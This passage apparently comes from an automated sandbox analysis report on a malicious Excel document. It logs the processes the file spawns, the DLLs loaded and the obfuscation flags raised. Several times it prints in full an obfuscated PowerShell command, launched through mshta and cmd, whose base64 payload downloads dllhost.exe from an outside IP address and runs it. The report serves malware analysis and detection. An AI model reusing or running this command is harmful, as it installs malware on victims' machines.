            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64win.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wow64cpu.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: wsock32.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: dwmapi.dll
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdbhP source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdb source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: dllhost.exe, 0000000B.00000003.457458301.0000000003900000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.459419334.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492203935.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492301433.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: .pdb) source: powershell.exe, 00000011.00000002.482289693.000000001AC63000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdb source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdbhP source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
            Source: B8230000.0.drInitial sample: OLE indicators vbamacros = False
            Source: SYSN ORDER.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            PowerShell case anomaly found
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0